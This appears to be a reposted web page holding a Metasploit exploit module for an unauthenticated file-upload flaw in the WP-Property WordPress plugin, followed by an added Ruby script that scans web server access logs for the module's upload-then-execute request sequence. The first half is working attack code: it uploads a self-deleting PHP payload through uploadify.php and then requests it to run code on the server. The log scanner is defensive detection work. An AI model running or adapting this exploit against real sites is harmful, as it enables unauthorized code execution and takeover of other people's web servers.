WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end

Don't ask me what this is or how to exploit it. I'm talking about msf.
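
Because the module asks for `get_write_exec_payload(:unlink_self=>true)`, the uploaded file removes itself after it runs, so the web server access log is where the evidence remains. The following is an added example (not part of the original post or the Metasploit project) that scans an access log for the request sequence the module produces; the combined log format, the `EXPECTED_SCRIPTS` allowlist, the rule names and the sample lines are assumptions made for illustration:

```ruby
# Added example, not part of the original post or the Metasploit project.
# Assumes Apache/nginx "combined" access-log lines; SAMPLE_LOG is constructed.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze
# Assumption: scripts a clean plugin copy ships here; adjust to your install.
EXPECTED_SCRIPTS = %w[uploadify.php check.php].freeze
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-"
  203.0.113.20 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 300 "-" "-"
LOG

# Returns one hash per suspicious request, in log order.
def scan_access_log(text)
  findings = []
  uploaders = {} # client IPs that got a 200 from a POST to uploadify.php
  text.each_line do |line|
    m = LOG_RE.match(line) or next
    path = m[:path].split('?', 2).first
    idx = path.index(UPLOADIFY_DIR) or next
    name = path[(idx + UPLOADIFY_DIR.length)..]
    hit = { ip: m[:ip], path: path, status: m[:status] }
    if m[:method] == 'POST' && name == 'uploadify.php'
      # Unauthenticated upload endpoint: every POST to it deserves a look.
      uploaders[m[:ip]] = true if m[:status] == '200'
      findings << hit.merge(rule: :upload_post)
    elsif name.match?(/\.php\z/i) && !EXPECTED_SCRIPTS.include?(name)
      # A PHP file that does not belong in this directory was requested.
      rule = uploaders[m[:ip]] ? :upload_then_exec : :unexpected_php
      findings << hit.merge(rule: rule)
    end
  end
  findings
end

scan_access_log(SAMPLE_LOG).each { |f| puts f.inspect } if $PROGRAM_NAME == __FILE__
```

The `folder` form field is supplied by the client, so a hit on `:upload_post` alone is worth reviewing even when no unexpected `.php` request follows in the same directory.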